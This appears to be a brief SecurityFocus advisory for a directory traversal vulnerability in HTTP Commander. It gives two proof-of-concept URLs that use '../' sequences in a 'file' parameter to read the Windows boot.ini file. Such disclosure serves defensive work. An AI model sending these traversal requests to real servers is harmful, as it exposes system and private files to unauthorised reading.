HTTP Commander Directory Traversal Vulnerability

The following proof of concept has been provided:

http://www.example.com/NetDemo2/OpenFile.aspx?file=../../../../../../../../boot.ini

http://www.example.com/NetDemo2/html.aspx?file=../../../../../../../../../boot.ini


 

Privacy Statement
Copyright 2010, SecurityFocus